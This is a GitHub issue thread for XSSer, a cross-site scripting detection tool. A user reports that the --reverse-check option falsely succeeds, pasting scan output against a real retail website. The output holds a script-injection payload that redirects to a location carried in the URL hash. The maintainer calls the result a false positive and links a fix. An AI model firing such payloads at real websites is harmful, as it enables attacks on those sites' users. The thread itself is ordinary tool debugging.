search

epsylon / xsser

Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
https://xsser.03c8.net
1.17k stars 238 forks source link

XSSER --reverse-check is always success ! #56

Closed geople closed 4 years ago

geople commented 4 years ago

Example : 

# xsser  -u "https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place=XSS" --reverse-check

 [ https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place=XSS ]

[!] Hashing:

 [ 444ef6f1117eff2584f0781a7f1a38f5 ] : [ place ]

[*] Trying:

https://www.starbucks.com/store-locator?map=38.947636%2C-94.683637%2C11z&place=%22%3E444ef6f1117eff2584f0781a7f1a38f5

---------------------------------------------

[+] Vulnerable(s):

 [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

---------------------------------------------

=============================================
[*] Injection(s) Results:
=============================================

 [ FOUND! ] -> [ 444ef6f1117eff2584f0781a7f1a38f5 ] : [ place ] -> [ ">PAYLOAD ]

-------------------------

[Info] Generating 'token' url:

https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place="><script>document.location=document.location.hash.substring(1)</script>"><script>document.location=document.location.hash.substring(1)</script>#http://localhost:19084/success/444ef6f1117eff2584f0781a7f1a38f5

==================================================

[Info] CONGRATULATIONS!!! <-> This vector is doing a remote connection... So, is: 100% VULNERABLE! ;-)

https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place=XSS

==================================================

==================================================
Mosquito(es) landed!
==================================================

===========================================================================
[*] Final Results:
===========================================================================

- Injections: 1
- Failed: 0
- Successful: 1
- Accur: 100.0 %

===========================================================================
[*] List of XSS injections:
===========================================================================

You have found: [ 1 ] XSS vector(s)! -> [100% VULNERABLE]

---------------------

[+] Target: https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place=XSS
[+] Vector: [ place ]
[!] Method: URL
[*] Hash: 444ef6f1117eff2584f0781a7f1a38f5
[*] Payload: https://www.starbucks.com/store-locator?map=38.947636%2C-94.683637%2C11z&place=%22%3E444ef6f1117eff2584f0781a7f1a38f5
[!] Vulnerable: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
[!] Status: XSS FOUND!
 --------------------------------------------------
epsylon commented 4 years ago

Hi @geople

It looks like a "false positive", directly realted with the AJAX script used by the target to reply (but not related with --reverse-check) which isn't contemplated in our anti-false positives filters:

"selectedStoreId":"1008953","expandedStoreId":null}},"router":{"location":{"pathname":"/store-l
ocator/","search":"?map=38.947636%2C-94.683637%2C11z&place=%22%3E1e4ea2e8ba5b8aa31f2d4df677183ede","hash":"","key":"1q2coj","query":{"map":"38.947636%2C-94.683637%2C11z","place":"%22%3E1e4ea
2e8ba5b8aa31f2d4df677183ede"}},"action":"POP"},"routes":{"current":{"pathname":"/store-locator/","hash":"","search":"?map=38.947636%2C-94.683637%2C11z&place=%22%3E1e4ea2e8ba5b8aa31f2d4df6771
83ede","state":{},"route":"/store-locator*","params":{"0":"/"},"query":{"map":"38.947636,-94.683637,11z","place":"\\">1e4ea2e8ba5b8aa31f2d4df677183ede"}

I will add a fix for it, soon.

Thanks for your report.

epsylon commented 4 years ago

This issue should be fixed after this commit: https://github.com/epsylon/xsser/commit/93897b24d37ca30b8507387d1cc9418a427e876f